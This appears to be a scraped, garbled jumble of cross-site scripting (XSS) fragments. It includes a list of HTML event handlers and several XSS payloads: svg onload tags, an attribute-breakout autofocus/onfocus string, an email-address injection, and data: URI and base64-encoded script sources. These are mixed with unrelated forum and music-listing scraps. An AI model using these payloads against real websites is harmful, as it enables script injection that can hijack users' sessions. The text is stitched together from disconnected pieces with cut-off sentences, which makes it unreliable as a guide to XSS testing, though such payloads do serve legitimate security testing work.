...onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
XSS inside an attribute value: '%20autofocus%20onfocus='alert(); - onfocus will not work if the input tag has the attribute type=hidden ' " onfocus='alert
(RFC compliant). "><svg/onload=confirm(1)>"@x.y. Bypass document blacklist.
but the same thing is working fine in Chrome (no alert). For Chrome, when I am checking dev tools, the URL is coming in encoded format.
onload is most often used within the <body> element to execute a script once a web page has completely loaded all content (including
<frameset onload=javascript:alert(1)>.
<svg/onload=alert(1)> said">
"><svg/onload=alert(1)> said: I found a vulnerability on your website. Do you have a bug bounty program?
XSS using data. data:text/html,<script>alert(0)</script>data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ
<Svg Onload">
"><Svg Onload=Alert(1)>. 3 tracks found. "> — "> :javascript.alert(1). 3:23.